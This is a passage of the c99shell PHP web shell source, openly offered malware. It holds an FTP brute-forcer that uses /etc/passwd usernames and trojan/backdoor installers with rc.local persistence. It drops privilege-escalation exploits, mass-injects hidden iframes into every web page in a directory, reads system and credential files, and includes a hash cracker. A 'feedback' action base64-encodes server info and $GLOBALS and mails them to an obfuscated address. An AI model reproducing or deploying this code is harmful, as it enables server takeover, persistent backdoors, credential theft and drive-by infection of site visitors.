1916. if （$act ＝＝ "ftpquickbrute"）
1917. {
1918. echo "＜b＞Ftp Quick brute:＜/b＞＜br＞";
1919. if （!win） {echo "This function does not work in Windows!＜br＞＜br＞";}
1920. else
1921. {
1922. function c99ftpbrutecheck（$host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh）
1923. {
1924. if （$fqb_onlywithsh） {$TRUE ＝ （!in_array（$sh,array（"/bin/FALSE","/sbin/nologin"）））;}
1925. else {$TRUE ＝ TRUE;}
1926. if （$TRUE）
1927. {
1928. $sock ＝ @ftp_connect（$host,$port,$timeout）;
1929. if （@ftp_login（$sock,$login,$pass））
1930. {
1931. echo "＜a href＝\"ftp://".$login.":".$pass."@".$host."\" target＝\"_blank\"＞＜b＞Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"＜/b＞＜/a＞.＜br＞";
1932. ob_flush（）;
1933. return TRUE;
1934. }
1935. }
1936. }
1937. if （!empty（$submit））
1938. {
1939. if （!is_numeric（$fqb_lenght）） {$fqb_lenght ＝ $nixpwdperpage;}
1940. $fp ＝ fopen（"/etc/passwd","r"）;
1941. if （!$fp） {echo "Can't get /etc/passwd for password-list.";}
1942. else
1943. {
1944. if （$fqb_logging）
1945. {
1946. if （$fqb_logfile） {$fqb_logfp ＝ fopen（$fqb_logfile,"w"）;}
1947. else {$fqb_logfp ＝ FALSE;}
1948. $fqb_log ＝ "FTP Quick Brute （called c99shell v. ".$shver."） started at ".date（"d.m.Y H:i:s"）."\r\n\r\n";
1949. if （$fqb_logfile） {fwrite（$fqb_logfp,$fqb_log,strlen（$fqb_log））;}
1950. }
1951. ob_flush（）;
1952. $i ＝ $success ＝ 0;
1953. $ftpquick_st ＝ getmicrotime（）;
1954. while（!feof（$fp））
1955. {
1956. $str ＝ explode（":",fgets（$fp,2048））;
1957. if （c99ftpbrutecheck（"localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh））
1958. {
1959. echo "＜b＞Connected to ".getenv（"SERVER_NAME"）." with login \"".$str[0]."\" and password \"".$str[0]."\"＜/b＞＜br＞";
1960. $fqb_log .＝ "Connected to ".getenv（"SERVER_NAME"）." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date（"d.m.Y H:i:s"）."\r\n";
1961. if （$fqb_logfp） {fseek（$fqb_logfp,0）; fwrite（$fqb_logfp,$fqb_log,strlen（$fqb_log））;}
1962. $success++;
1963. ob_flush（）;
1964. }
1965. if （$i ＞ $fqb_lenght） {break;}
1966. $i++;
1967. }
1968. if （$success ＝＝ 0） {echo "No success. connections!"; $fqb_log .＝ "No success. connections!\r\n";}
1969. $ftpquick_t ＝ round（getmicrotime（）-$ftpquick_st,4）;
1970. echo "＜hr size＝\"1\" noshade＞＜b＞Done!＜/b＞＜br＞Total time （secs.）: ".$ftpquick_t."＜br＞Total connections: ".$i."＜br＞Success.: ＜font color＝green＞＜b＞".$success."＜/b＞＜/font＞＜br＞Unsuccess.:".（$i-$success）."＜/b＞＜br＞Connects per second: ".round（$i/$ftpquick_t,2）."＜br＞";
1971. $fqb_log .＝ "\r\n------------------------------------------\r\nDone!\r\nTotal time （secs.）: ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".（$i-$success）."\r\nConnects per second: ".round（$i/$ftpquick_t,2）."\r\n";
1972. if （$fqb_logfp） {fseek（$fqb_logfp,0）; fwrite（$fqb_logfp,$fqb_log,strlen（$fqb_log））;}
1973. if （$fqb_logemail） {@mail（$fqb_logemail,"c99shell v. ".$shver." report",$fqb_log）;}
1974. fclose（$fqb_logfp）;
1975. }
1976. }
1977. else
1978. {
1979. $logfile ＝ $tmpdir_logs."c99sh_ftpquickbrute_".date（"d.m.Y_H_i_s"）.".log";
1980. $logfile ＝ str_replace（"//",DIRECTORY_SEPARATOR,$logfile）;
1981. echo "＜form action＝\"".$surl."\"＞＜input type＝hidden name＝act value＝\"ftpquickbrute\"＞＜br＞Read first: ＜input type＝text name＝\"fqb_lenght\" value＝\"".$nixpwdperpage."\"＞＜br＞＜br＞Users only with shell? ＜input type＝\"checkbox\" name＝\"fqb_onlywithsh\" value＝\"1\"＞＜br＞＜br＞Logging? ＜input type＝\"checkbox\" name＝\"fqb_logging\" value＝\"1\" checked＞＜br＞Logging to file? ＜input type＝\"text\" name＝\"fqb_logfile\" value＝\"".$logfile."\" size＝\"".（strlen（$logfile）+2*（strlen（$logfile）/10））."\"＞＜br＞Logging to e-mail? ＜input type＝\"text\" name＝\"fqb_logemail\" value＝\"".$log_email."\" size＝\"".（strlen（$logemail）+2*（strlen（$logemail）/10））."\"＞＜br＞＜br＞＜input type＝submit name＝submit value＝\"Brute\"＞＜/form＞";
1982. }
1983. }
1984. }
1985. if （$act ＝＝ 'd'）
1986. {
1987. if （!is_dir（$d）） {echo "＜center＞＜b＞Permision denied!＜/b＞＜/center＞";}
1988. else
1989. {
1990. echo "＜b＞Directory information:＜/b＞＜table border＝0 cellspacing＝1 cellpadding＝2＞";
1991. if （!$win）
1992. {
1993. echo "＜tr＞＜td＞＜b＞Owner/Group＜/b＞＜/td＞＜td＞ ";
1994. $ow ＝ posix_getpwuid（fileowner（$d））;
1995. $gr ＝ posix_getgrgid（filegroup（$d））;
1996. $row[] ＝ （$ow["name"]?$ow["name"]:fileowner（$d））."/".（$gr["name"]?$gr["name"]:filegroup（$d））;
1997. }
1998. echo "＜tr＞＜td＞＜b＞Perms＜/b＞＜/td＞＜td＞＜a href＝\"".$surl."act＝chmod&d＝".urlencode（$d）."\"＞＜b＞".view_perms_color（$d）."＜/b＞＜/a＞＜tr＞＜td＞＜b＞Create time＜/b＞＜/td＞＜td＞ ".date（"d/m/Y H:i:s",filectime（$d））."＜/td＞＜/tr＞＜tr＞＜td＞＜b＞Access time＜/b＞＜/td＞＜td＞ ".date（"d/m/Y H:i:s",fileatime（$d））."＜/td＞＜/tr＞＜tr＞＜td＞＜b＞MODIFY time＜/b＞＜/td＞＜td＞ ".date（"d/m/Y H:i:s",filemtime（$d））."＜/td＞＜/tr＞＜/table＞＜br＞";
1999. }
2000. }
2001. if （$act ＝＝ 'phpinfo'） {@ob_clean（）; phpinfo（）; c99shexit（）;}
2002.  
2003. if （$act ＝＝ 'trojan'） {
2004. echo '＜b＞Install Trojan Server:＜/b＞＜br＞＜br＞';
2005. if （$win） {
2006. echo 'Please keep in mind that these are ＜u＞not＜/u＞ undetectable trojans. Any decent anti-virus will pick them up, and they take no action to bypass firewalls or routers. Use at your own risk.＜br＞＜br＞';
2007. ?＞
2008. ＜form action＝"＜?php echo $surl; ?＞" method＝GET＞
2009. Choose Trojan: ＜select name＝"choosetrojan"＞
2010. ＜option value＝"beast"＞Beast v2.07＜/option＞
2011. ＜/select＞
2012. ＜input type＝hidden name＝"act" value＝"trojan"＞
2013. ＜input type＝submit value＝"Install Server"＞
2014. ＜/form＞
2015. ＜?php
2016. $choosetrojan ＝ $_GET['choosetrojan'];
2017. if （$choosetrojan ＝＝ 'beast'） {
2018. if （is_writable（'.'）） {
2019. cf（'server.exe', $beast）;
2020. exec（'server.exe'）;
2021. echo 'Beast trojan server is running on port 6666 with no password.＜br＞';
2022. }else{
2023. echo 'Directory Is Not Writable!＜br＞';
2024. }
2025. } // end if beast was called
2026. } else { // if not windows
2027. ?＞
2028. ＜b＞Install Backdoor:＜/b＞＜br＞＜br＞
2029. ＜form action＝"＜?php echo $surl; ?＞" method＝GET＞
2030. Choose Backdoor: ＜select name＝"choosebackdoor"＞
2031. ＜option value＝"blackhole"＞Blackhole＜/option＞
2032. ＜/select＞
2033. ＜input type＝hidden name＝"act" value＝"trojan"＞
2034. ＜input type＝submit value＝"Install Server"＞
2035. ＜/form＞
2036. ＜?php
2037. $choosebackdoor ＝ $_GET['choosebackdoor'];
2038. if （$choosebackdoor ＝＝ 'blackhole'） {
2039. if （is_writable（'.'）） {
2040. cf（'apache', $blackhole）;
2041. echo 'Blackhole is _not_ running. Go to the shell and run it yourself. Here\'s the example from the readme:＜br＞＜pre＞ # ./backhole &
2042. i.e. # mv backhole /some/path/fakemail
2043. # chmod 4770 /path/to/fakemail
2044. # echo "/path/to/fakemail &" ＞＞ /etc/rc.d/rc.local
2045. # /path/to/fakemail &＜/pre＞Blackhole is configured to run under the process name \'apache\' on port 6875.＜br＞';
2046. }else{
2047. echo 'Directory Is Not Writable!＜br＞';
2048. }
2049. } // end if beast was called
2050.  
2051.  
2052. } // end if windows/unix
2053. } // end if trojan was called
2054.  
2055. if （$act ＝＝ 'exploits'） {
2056. ?＞
2057. ＜b＞Exploits:＜/b＞
2058. ＜br＞＜br＞
2059. All exploits are pre-compiled. Just follow the directions.
2060. ＜br＞＜br＞
2061. ＜a href＝"＜?php echo $surl; ?＞act＝exploits&sploit＝h00lyshit"＞h00lyshit - Local Race Exploit＜/a＞
2062. ＜?php
2063. if （$_GET['sploit'] ＝＝ 'h00lyshit'） {
2064. if （is_writable（'.'）） {
2065. cf（'h00lyshit', $h00lyshit）;
2066. echo htmlentities（'h00lyshit was created in the script directory. Now go find/make a 100mb file and execute "./h00lyshit ＜path_to_100mb_file＞".'）;
2067. }else{
2068. echo 'Directory Is Not Writable!＜br＞';
2069. }
2070. } // end if h00lyshit was called
2071. ?＞
2072. ＜br＞＜br＞
2073. ＜a href＝"＜?php echo $surl; ?＞act＝exploits&sploit＝raptorchown"＞raptor_chown - Group Modification Exploit＜/a＞
2074. ＜?php
2075. if （$_GET['sploit'] ＝＝ 'raptorchown'） {
2076. if （is_writable（'.'）） {
2077. cf（'raptor_chown', $raptorchown）;
2078. echo htmlentities（'raptor_chown was created in the script directory. Now execute "./raptor_chown ＜path_to_file_you_want_to_edit_group_of＞".'）;
2079. }else{
2080. echo 'Directory Is Not Writable!＜br＞';
2081. }
2082. } // end if raptor_chown was called
2083.  
2084.  
2085. } // end if exploits is called
2086. if （$act ＝＝ 'massbrowsersploit'） {
2087. ?＞
2088. ＜b＞Mass Code Injection:＜/b＞＜br＞＜br＞
2089. Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.＜br＞＜br＞
2090. ＜form action＝"＜?php echo $surl; ?＞" method＝GET＞
2091. ＜input type＝hidden name＝"masssploit" value＝"goahead"＞
2092. ＜input type＝hidden name＝"act" value＝"massbrowsersploit"＞
2093. ＜table border＝0＞
2094. ＜tr＞＜td＞Dir to inject: ＜/td＞＜td＞＜input type＝text size＝50 name＝"pathtomass" value＝"＜?php echo realpath（'.'）; ?＞"＞ ＜-- default is dir this shell is in＜/td＞＜/tr＞
2095. ＜tr＞＜td＞Code to inject: ＜/td＞＜td＞＜textarea name＝"injectthis" cols＝50 rows＝4＞＜?php echo htmlspecialchars（'＜IFRAME src＝"http://www.google.com" width＝0 height＝0 frameborder＝0＞＜/IFRAME＞'）; ?＞＜/textarea＞ ＜-- best bet would be to include an invisible iframe of browser exploits＜/td＞＜/tr＞
2096. ＜tr＞＜td＞＜input type＝submit value＝"Inject Code"＞＜/td＞＜/tr＞
2097. ＜/table＞
2098. ＜/form＞
2099. ＜?php
2100. if （$_GET['masssploit'] ＝＝ 'goahead'） {
2101. if （is_dir（$_GET['pathtomass']）） {
2102. $lolinject ＝ $_GET['injectthis'];
2103. foreach （glob（$_GET['pathtomass']."/*.php"） as $injectj00） {
2104. $fp＝fopen（$injectj00,"a+"）;
2105. if （fputs（$fp,$lolinject））{
2106. echo $injectj00.' was injected＜br＞';
2107. } else {
2108. echo '＜font color＝red＞failed to inject '.$injectj00.'＜/font＞';
2109. }
2110. }
2111. foreach （glob（$_GET['pathtomass']."/*.htm"） as $injectj00） {
2112. $fp＝fopen（$injectj00,"a+"）;
2113. if （fputs（$fp,$lolinject））{
2114. echo $injectj00.' was injected＜br＞';
2115. } else {
2116. echo '＜font color＝red＞failed to inject '.$injectj00.'＜/font＞';
2117. }
2118. }
2119. foreach （glob（$_GET['pathtomass']."/*.html"） as $injectj00） {
2120. $fp＝fopen（$injectj00,"a+"）;
2121. if （fputs（$fp,$lolinject））{
2122. echo $injectj00.' was injected＜br＞';
2123. } else {
2124. echo '＜font color＝red＞failed to inject '.$injectj00.'＜/font＞';
2125. }
2126. }
2127. } else { //end if inputted dir is real -- if not, show an ugly red error
2128. echo '＜b＞＜font color＝red＞'.$_GET['pathtomass'].' is not available!＜/font＞＜/b＞';
2129. } // end if inputted dir is real, for real this time
2130. } // end if confirmation to mass sploit is go
2131. } // end if massbrowsersploit is called
2132.  
2133. if （$act ＝＝ 'security'）
2134. {
2135. echo "＜center＞＜b＞Server security information:＜/b＞＜/center＞＜b＞Open base dir: ".$hopenbasedir."＜/b＞＜br＞";
2136. if （!$win）
2137. {
2138. if （$nixpasswd）
2139. {
2140. if （$nixpasswd ＝＝ 1） {$nixpasswd ＝ 0;}
2141. echo "＜b＞*nix /etc/passwd:＜/b＞＜br＞";
2142. if （!is_numeric（$nixpwd_s）） {$nixpwd_s ＝ 0;}
2143. if （!is_numeric（$nixpwd_e）） {$nixpwd_e ＝ $nixpwdperpage;}
2144. echo "＜form action＝\"".$surl."\"＞＜input type＝hidden name＝act value＝\"security\"＞＜input type＝hidden name＝\"nixpasswd\" value＝\"1\"＞＜b＞From:＜/b＞ ＜input type＝\"text＝\" name＝\"nixpwd_s\" value＝\"".$nixpwd_s."\"＞ ＜b＞To:＜/b＞ ＜input type＝\"text\" name＝\"nixpwd_e\" value＝\"".$nixpwd_e."\"＞ ＜input type＝submit value＝\"View\"＞＜/form＞＜br＞";
2145. $i ＝ $nixpwd_s;
2146. while （$i ＜ $nixpwd_e）
2147. {
2148. $uid ＝ posix_getpwuid（$i）;
2149. if （$uid）
2150. {
2151. $uid["dir"] ＝ "＜a href＝\"".$surl."act＝ls&d＝".urlencode（$uid["dir"]）."\"＞".$uid["dir"]."＜/a＞";
2152. echo join（":",$uid）."＜br＞";
2153. }
2154. $i++;
2155. }
2156. }
2157. else {echo "＜br＞＜a href＝\"".$surl."act＝security&nixpasswd＝1&d＝".$ud."\"＞＜b＞＜u＞Get /etc/passwd＜/u＞＜/b＞＜/a＞＜br＞";}
2158. if （file_get_contents（"/etc/userdomains"）） {echo "＜b＞＜font color＝green＞＜a href＝\"".$surl."act＝f&f＝userdomains&d＝".urlencode（"/etc"）."&ft＝txt\"＞＜u＞＜b＞View cpanel user-domains logs＜/b＞＜/u＞＜/a＞＜/font＞＜/b＞＜br＞";}
2159. if （file_get_contents（"/var/cpanel/accounting.log"）） {echo "＜b＞＜font color＝green＞＜a href＝\"".$surl."act＝f&f＝accounting.log&d＝".urlencode（"/var/cpanel/"）."\"&ft＝txt＞＜u＞＜b＞View cpanel logs＜/b＞＜/u＞＜/a＞＜/font＞＜/b＞＜br＞";}
2160. if （file_get_contents（"/usr/local/apache/conf/httpd.conf"）） {echo "＜b＞＜font color＝green＞＜a href＝\"".$surl."act＝f&f＝httpd.conf&d＝".urlencode（"/usr/local/apache/conf"）."&ft＝txt\"＞＜u＞＜b＞Apache configuration （httpd.conf）＜/b＞＜/u＞＜/a＞＜/font＞＜/b＞＜br＞";}
2161. if （file_get_contents（"/etc/httpd.conf"）） {echo "＜b＞＜font color＝green＞＜a href＝\"".$surl."act＝f&f＝httpd.conf&d＝".urlencode（"/etc"）."&ft＝txt\"＞＜u＞＜b＞Apache configuration （httpd.conf）＜/b＞＜/u＞＜/a＞＜/font＞＜/b＞＜br＞";}
2162. if （file_get_contents（"/etc/syslog.conf"）） {echo "＜b＞＜font color＝green＞＜a href＝\"".$surl."act＝f&f＝syslog.conf&d＝".urlencode（"/etc"）."&ft＝txt\"＞＜u＞＜b＞Syslog configuration （syslog.conf）＜/b＞＜/u＞＜/a＞＜/font＞＜/b＞＜br＞";}
2163. if （file_get_contents（"/etc/motd"）） {echo "＜b＞＜font color＝green＞＜a href＝\"".$surl."act＝f&f＝motd&d＝".urlencode（"/etc"）."&ft＝txt\"＞＜u＞＜b＞Message Of The Day＜/b＞＜/u＞＜/a＞＜/font＞＜/b＞＜br＞";}
2164. if （file_get_contents（"/etc/hosts"）） {echo "＜b＞＜font color＝green＞＜a href＝\"".$surl."act＝f&f＝hosts&d＝".urlencode（"/etc"）."&ft＝txt\"＞＜u＞＜b＞Hosts＜/b＞＜/u＞＜/a＞＜/font＞＜/b＞＜br＞";}
2165. function displaysecinfo（$name,$value） {if （!empty（$value）） {if （!empty（$name）） {$name ＝ "＜b＞".$name." - ＜/b＞";} echo $name.nl2br（$value）."＜br＞";}}
2166. displaysecinfo（"OS Version?",myshellexec（"cat /proc/version"））;
2167. displaysecinfo（"Kernel version?",myshellexec（"sysctl -a | grep version"））;
2168. displaysecinfo（"Distrib name",myshellexec（"cat /etc/issue.net"））;
2169. displaysecinfo（"Distrib name （2）",myshellexec（"cat /etc/*-realise"））;
2170. displaysecinfo（"CPU?",myshellexec（"cat /proc/cpuinfo"））;
2171. displaysecinfo（"RAM",myshellexec（"free -m"））;
2172. displaysecinfo（"HDD space",myshellexec（"df -h"））;
2173. displaysecinfo（"List of Attributes",myshellexec（"lsattr -a"））;
2174. displaysecinfo（"Mount options ",myshellexec（"cat /etc/fstab"））;
2175. displaysecinfo（"Is cURL installed?",myshellexec（"which curl"））;
2176. displaysecinfo（"Is lynx installed?",myshellexec（"which lynx"））;
2177. displaysecinfo（"Is links installed?",myshellexec（"which links"））;
2178. displaysecinfo（"Is fetch installed?",myshellexec（"which fetch"））;
2179. displaysecinfo（"Is GET installed?",myshellexec（"which GET"））;
2180. displaysecinfo（"Is perl installed?",myshellexec（"which perl"））;
2181. displaysecinfo（"Where is apache",myshellexec（"whereis apache"））;
2182. displaysecinfo（"Where is perl?",myshellexec（"whereis perl"））;
2183. displaysecinfo（"locate proftpd.conf",myshellexec（"locate proftpd.conf"））;
2184. displaysecinfo（"locate httpd.conf",myshellexec（"locate httpd.conf"））;
2185. displaysecinfo（"locate my.conf",myshellexec（"locate my.conf"））;
2186. displaysecinfo（"locate psybnc.conf",myshellexec（"locate psybnc.conf"））;
2187. }
2188. else
2189. {
2190. exec（'systeminfo', $wininfo）;
2191. ?＞
2192. ＜br＞DOS command: ＜b＞systeminfo＜/b＞＜br＞
2193. ＜textarea cols＝125 rows＝＜?php echo count（$wininfo）; ?＞＞＜?php
2194. if （$wininfo） {
2195. foreach（$wininfo as $row）
2196. echo $row."\n";
2197. } else { // if systeminfo failed
2198. echo 'Couldn\'t execute command!';
2199. }
2200. ?＞
2201. ＜/textarea＞
2202. ＜?php
2203. }
2204.  
2205. }
2206. if （$act ＝＝ 'mkfile'）
2207. {
2208. if （$mkfile !＝ $d）
2209. {
2210. if （file_exists（$mkfile）） {echo "＜b＞Make File \"".htmlspecialchars（$mkfile）."\"＜/b＞: object alredy exists";}
2211. elseif （!fopen（$mkfile,'w'）） {echo '＜b＞Make File "'.htmlspecialchars（$mkfile）.'"＜/b＞: access denied';}
2212. else {$act ＝ 'f'; $d ＝ dirname（$mkfile）; if （substr（$d,-1） !＝ DIRECTORY_SEPARATOR） {$d .＝ DIRECTORY_SEPARATOR;} $f ＝ basename（$mkfile）;}
2213. }
2214. else {$act ＝ $dspact ＝ 'ls';}
2215. }
2216. if （$act ＝＝ 'encoder'）
2217. {
2218. echo "＜script＞function set_encoder_input（text） {document.forms.encoder.input.value ＝ text;}＜/script＞＜center＞＜b＞Encoder:＜/b＞＜/center＞＜form name＝\"encoder\" action＝\"".$surl."\" method＝POST＞＜input type＝hidden name＝act value＝encoder＞＜b＞Input:＜/b＞＜center＞＜textarea name＝\"encoder_input\" id＝\"input\" cols＝50 rows＝5＞".@htmlspecialchars（$encoder_input）."＜/textarea＞＜br＞＜br＞＜input type＝submit value＝\"calculate\"＞＜br＞＜br＞＜/center＞＜b＞Hashes＜/b＞:＜br＞＜center＞";
2219. foreach（array（"md5","crypt","sha1","crc32"） as $v）
2220. {
2221. echo $v." - ＜input type＝text size＝50 onFocus＝\"this.select（）\" onMouseover＝\"this.select（）\" onMouseout＝\"this.select（）\" value＝\"".$v（$encoder_input）."\" readonly＞＜br＞";
2222. }
2223. echo "＜/center＞＜b＞Url:＜/b＞＜center＞＜br＞urlencode - ＜input type＝text size＝35 onFocus＝\"this.select（）\" onMouseover＝\"this.select（）\" onMouseout＝\"this.select（）\" value＝\"".urlencode（$encoder_input）."\" readonly＞
2224. ＜br＞urldecode - ＜input type＝text size＝35 onFocus＝\"this.select（）\" onMouseover＝\"this.select（）\" onMouseout＝\"this.select（）\" value＝\"".htmlspecialchars（urldecode（$encoder_input））."\" readonly＞
2225. ＜br＞＜/center＞＜b＞Base64:＜/b＞＜center＞base64_encode - ＜input type＝text size＝35 onFocus＝\"this.select（）\" onMouseover＝\"this.select（）\" onMouseout＝\"this.select（）\" value＝\"".base64_encode（$encoder_input）."\" readonly＞＜/center＞";
2226. echo "＜center＞base64_decode - ";
2227. if （base64_encode（base64_decode（$encoder_input）） !＝ $encoder_input） {echo "＜input type＝text size＝35 value＝\"failed\" disabled readonly＞";}
2228. else
2229. {
2230. $debase64 ＝ base64_decode（$encoder_input）;
2231. $debase64 ＝ str_replace（"\0","[0]",$debase64）;
2232. $a ＝ explode（"\r\n",$debase64）;
2233. $rows ＝ count（$a）;
2234. $debase64 ＝ htmlspecialchars（$debase64）;
2235. if （$rows ＝＝ 1） {echo "＜input type＝text size＝35 onFocus＝\"this.select（）\" onMouseover＝\"this.select（）\" onMouseout＝\"this.select（）\" value＝\"".$debase64."\" id＝\"debase64\" readonly＞";}
2236. else {$rows++; echo "＜textarea cols＝\"40\" rows＝\"".$rows."\" onFocus＝\"this.select（）\" onMouseover＝\"this.select（）\" onMouseout＝\"this.select（）\" id＝\"debase64\" readonly＞".$debase64."＜/textarea＞";}
2237. echo " ＜a href＝\"#\" onclick＝\"set_encoder_input（document.forms.encoder.debase64.value）\"＞＜b＞^＜/b＞＜/a＞";
2238. }
2239. echo "＜/center＞＜br＞＜b＞Base convertations＜/b＞:＜center＞dec2hex - ＜input type＝text size＝35 onFocus＝\"this.select（）\" onMouseover＝\"this.select（）\" onMouseout＝\"this.select（）\" value＝\"";
2240. $c ＝ strlen（$encoder_input）;
2241. for（$i＝0;$i＜$c;$i++）
2242. {
2243. $hex ＝ dechex（ord（$encoder_input[$i]））;
2244. if （$encoder_input[$i] ＝＝ "&"） {echo $encoder_input[$i];}
2245. elseif （$encoder_input[$i] !＝ "\\"） {echo "%".$hex;}
2246. }
2247. echo "\" readonly＞＜br＞＜/form＞";
2248.  
2249. ?＞
2250. ＜/center＞
2251. ＜br＞＜br＞
2252. ＜table border＝0 align＝center cellpadding＝4＞
2253. ＜tr＞＜td＞
2254. ＜center＞＜b＞Search milw0rm for MD5 hash＜/b＞＜/center＞
2255. ＜/td＞＜td＞
2256. ＜center＞＜b＞Search md5encryption.com for MD5 or SHA1 hash＜/b＞＜/center＞
2257. ＜/td＞＜td＞
2258. ＜center＞＜b＞Search CsTeam for MD5 hash＜/b＞＜/center＞
2259. ＜/td＞＜/tr＞
2260. ＜tr＞＜td＞
2261. ＜center＞
2262. ＜form target＝"_blank" action＝"http://www.milw0rm.com/cracker/search.php" method＝POST＞
2263. ＜input type＝text size＝40 name＝hash＞ ＜input type＝submit value＝"Submit"＞＜/form＞
2264. ＜/center＞
2265. ＜/td＞＜td＞
2266. ＜center＞
2267. ＜form target＝"_blank" action＝"http://www.md5encryption.com/?mod＝decrypt" method＝POST＞
2268. ＜input type＝text size＝40 name＝hash2word＞ ＜input type＝submit value＝"Submit"＞＜/form＞
2269. ＜/center＞
2270. ＜/td＞＜td＞
2271. ＜center＞
2272. ＜form target＝"_blank" action＝"http://www.csthis.com/md5/index.php" method＝POST＞
2273. ＜input type＝text size＝40 name＝h＞ ＜input type＝submit value＝"Submit"＞＜/form＞
2274. ＜/center＞
2275. ＜/td＞＜/tr＞
2276. ＜/table＞
2277. ＜br＞
2278. ＜center＞
2279. ＜b＞Wordlist Hash Cracker＜/b＞＜br＞＜br＞
2280. ＜form action＝"＜?php echo $surl; ?＞" method＝GET＞
2281. ＜input type＝hidden name＝"act" value＝"encoder"＞
2282. ＜input type＝hidden name＝"d" value＝"＜?php echo $d; ?＞"＞
2283. Enter hash: ＜input type＝text width＝300 name＝"hash" size＝40＞
2284. ＜br＞
2285. Wordlist: ＜input type＝text name＝"wordlist" size＝40＞
2286. ＜br＞
2287. Type: ＜select name＝"type"＞
2288. ＜option value＝"md5"＞MD5＜/option＞
2289. ＜option value＝"sha1"＞SHA1＜/option＞
2290. ＜/select＞ ＜input type＝submit value＝"Crack Hash"＞
2291. ＜/form＞
2292. ＜/center＞
2293. ＜?php
2294. // my wordlist cracker ^_^
2295. if （isset（$_GET['hash']） && isset（$_GET['wordlist']） && （$_GET['type'] ＝＝ 'md5' || $_GET['type'] ＝＝ 'sha1'）） {
2296. $type ＝ $_GET['type'];
2297. $hash ＝ $_GET['hash'];
2298. $count ＝ 1;
2299. $wordlist ＝ file（$_GET['wordlist']）;
2300. $words ＝ count（$wordlist）;
2301. foreach （$wordlist as $word） {
2302. echo $count.' of '.$words.': '.$word.'＜br＞';
2303. if （$hash ＝＝ $type（rtrim（$word））） {
2304. echo '＜font color＝red＞Great success! The password is: '.$word.'＜/font＞＜br＞';
2305. exit;
2306. }
2307. ++$count;
2308. }
2309. }
2310.  
2311. }
2312. if （$act ＝＝ 'fsbuff'）
2313. {
2314. $arr_copy ＝ $sess_data["copy"];
2315. $arr_cut ＝ $sess_data["cut"];
2316. $arr ＝ array_merge（$arr_copy,$arr_cut）;
2317. if （count（$arr） ＝＝ 0） {echo "＜center＞＜b＞Buffer is empty!＜/b＞＜/center＞";}
2318. else {echo "＜b＞File-System buffer＜/b＞＜br＞＜br＞"; $ls_arr ＝ $arr; $disp_fullpath ＝ TRUE; $act ＝ "ls";}
2319. }
2320. if （$act ＝＝ "selfremove"）
2321. {
2322. if （（$submit ＝＝ $rndcode） and （$submit !＝ ""））
2323. {
2324. if （unlink（__FILE__）） {@ob_clean（）; echo "Thanks for using c99shell v.".$shver."!"; c99shexit（）; }
2325. else {echo "＜center＞＜b＞Can't delete ".__FILE__."!＜/b＞＜/center＞";}
2326. }
2327. else
2328. {
2329. if （!empty（$rndcode）） {echo "＜b＞Error: incorrect confimation!＜/b＞";}
2330. $rnd ＝ rand（0,9）.rand（0,9）.rand（0,9）;
2331. echo "＜form action＝\"".$surl."\"＞＜input type＝hidden name＝act value＝selfremove＞＜b＞Self-remove: ".__FILE__." ＜br＞＜b＞Are you sure?＜br＞For confirmation, enter \"".$rnd."\"＜/b＞: ＜input type＝hidden name＝rndcode value＝\"".$rnd."\"＞＜input type＝text name＝submit＞ ＜input type＝submit value＝\"YES\"＞＜/form＞";
2332. }
2333. }
2334. if （$act ＝＝ "update"） {$ret ＝ c99sh_getupdate（!!$confirmupdate）; echo "＜b＞".$ret."＜/b＞"; if （stristr（$ret,"new version"）） {echo "＜br＞＜br＞＜input type＝button onclick＝\"location.href＝'".$surl."act＝update&confirmupdate＝1';\" value＝\"Update now\"＞";}}
2335. if （$act ＝＝ "feedback"）
2336. {
2337. $suppmail ＝ base64_decode（"Yzk5c2hlbGxAY2N0ZWFtLnJ1"）;
2338. if （!empty（$submit））
2339. {
2340. $ticket ＝ substr（md5（microtime（）+rand（1,1000））,0,6）;
2341. $body ＝ "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars（$fdbk_name）."\nE-mail: ".htmlspecialchars（$fdbk_email）."\nMessage:\n".htmlspecialchars（$fdbk_body）."\n\nIP: ".$REMOTE_ADDR;
2342. if （!empty（$fdbk_ref））
2343. {
2344. $tmp ＝ @ob_get_contents（）;
2345. ob_clean（）;
2346. phpinfo（）;
2347. $phpinfo ＝ base64_encode（ob_get_contents（））;
2348. ob_clean（）;
2349. echo $tmp;
2350. $body .＝ "\n"."phpinfo（）: ".$phpinfo."\n"."\$GLOBALS＝".base64_encode（serialize（$GLOBALS））."\n";
2351. }
2352. mail（$suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail）;
2353. echo "＜center＞＜b＞Thanks for your feedback! Your ticket ID: ".$ticket.".＜/b＞＜/center＞";
2354. }
2355. else {echo "＜form action＝\"".$surl."\" method＝POST＞＜input type＝hidden name＝act value＝feedback＞＜b＞Feedback or report bug （".str_replace（array（"@","."）,array（"[at]","[dot]"）,$suppmail）."）:＜br＞＜br＞Your name: ＜input type＝\"text\" name＝\"fdbk_name\" value＝\"".htmlspecialchars（$fdbk_name）."\"＞＜br＞＜br＞Your e-mail: ＜input type＝\"text\" name＝\"fdbk_email\" value＝\"".htmlspecialchars（$fdbk_email）."\"＞＜br＞＜br＞Message:＜br＞＜textarea name＝\"fdbk_body\" cols＝80 rows＝10＞".htmlspecialchars（$fdbk_body）."＜/textarea＞＜input type＝\"hidden\" name＝\"fdbk_ref\" value＝\"".urlencode（$HTTP_REFERER）."\"＞＜br＞＜br＞Attach server-info * ＜input type＝\"checkbox\" name＝\"fdbk_servinf\" value＝\"1\" checked＞＜br＞＜br＞There are no checking in the form.＜br＞＜br＞* - strongly recommended, if you report bug, because we need it for bug-fix.＜br＞＜br＞We understand languages: English, Russian.＜br＞＜br＞＜input type＝\"submit\" name＝\"submit\" value＝\"Send\"＞＜/form＞";}
2356. }
2357. if （$act ＝＝ "search"）
2358. {
2359. echo "＜b＞Search in file-system:＜/b＞＜br＞";
2360. if （empty（$search_in）） {$search_in ＝ $d;}
2361. if （empty（$search_name）） {$search_name ＝ "（.*）"; $search_name_regexp ＝ 1;}
2362. if （empty（$search_text_wwo）） {$search_text_regexp ＝ 0;}
2363. if （!empty（$submit））
2364. {
2365. $found ＝ array（）;
2366. $found_d ＝ 0;
2367. $found_f ＝ 0;
2368. $search_i_f ＝ 0;
